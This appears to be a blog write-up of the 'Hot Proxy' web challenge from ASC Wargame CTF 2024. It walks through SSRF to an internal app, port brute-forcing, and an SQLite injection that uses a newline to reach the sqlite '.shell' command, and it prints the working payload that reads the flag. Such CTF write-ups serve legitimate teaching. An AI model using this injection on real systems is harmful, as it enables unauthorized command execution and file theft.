[WEB] ASC Wargame CTF 2024 - Challenge Hot Proxy

 ( بِسْمِ اللَّـهِ الرَّحْمَـٰنِ الرَّحِيمِ )
(إن أحسنت فمن الله، وإن أسأت فمن نفسي والشيطان)


It was a nice CTF, I got 2nd place with my guys:

A picture during solving this challenge in the last 5m of the CTF (thinking that we got 1st place).

Let's walk through the Web Challenge Hot Proxy, note that we did not solve it during the time of the CTF it was a minute way, let's start.

Note: there is no source code in the challenge attachment, I requested it from the author (@serWazito0) thanks to him, challenges files ( ASCWG_2024_CTF ).

Note: the flag file in the server and called "flag_<RANDOM>.txt", so we have to get RCE.

From the title I know that there is an "SSRF" vulnerability in this challenge and from the description, we know that there is an internal application called "app1" with a route called "/secret" so our target is to access this one.

My first try is to send a call to the application in the request path

GET http://app1/secret HTTP/1.1

and it works and I got an error "Error fetching the URL."


in the CTF we got an announcement about brute forcing so if we brute force the ports for this app we can get a different response with port (9001) and we have a source code know


after reviewing the code we found that:

  • There is a SQL injection and the DB is SQLite3.
  • There is a filter we have to bypass, function "contains_blacklist".
  • The execution of the SQL command happens in the SQLite shell prompt itself in func "cursors_execute".


so how can we use the SQL injection in SQLite3 to gain RCE and read the flag?

after asking Google we end up with this screenshot


after trying it we faced an issue did not notice (maybe it was 2 minutes before the CTF end - focus was low) but we got another hint that we were in a shell, so what do we do when writing a line in the shell? yes ENTER but how we can do it now?

we tried a lot of things but nothing worked with us and after a lot of failures this works (%0a) as an ENTER so we have to write a valid SQL query that executes the Shell command, the following payload will read the flag and BINGO:
GET http://app1:9001/?username=flex';%0a.shell+cat+flag*%0a;select+' HTTP/1.1

but xD we could not find the flag for some reason the response just returned the folder of (app, DB) not all files and folders, and for some reason, I did not think about (*) but we got it with the author after the CTF by 1-minute xD.

Thanks for reading ;-);

عَنْ أُمِّ المُؤمِنِينَ أُمِّ عَبْدِ اللهِ عَائِشَةَ - رَضِيَ اللهُ عَنْهَا - قَالَتْ: قَالَ رَسُوْلُ اللهِ : " مَنْ أَحْدَثَ فِيْ أَمْرِنَا هَذَا مَا لَيْسَ مِنْهُ فَهُوَ رَدٌّ " رواه البخاري ومسلم، وفي رواية لمسلم " مَنْ عَمِلَ عَمَلاً لَيْسَ عَلَيْهِ أَمْرُنَا فَهُوَ رَدٌّ "


Comments

Popular posts from this blog

Exploit & Debug Looney Tunables CVE-2023-4911 Local Privilege Escalation in the glibc's ld.so

[BlackHatMEA-CTF 2024] cockatoo PWN challenge

Lets Analysis STM32F103 Chip Firmware from Attify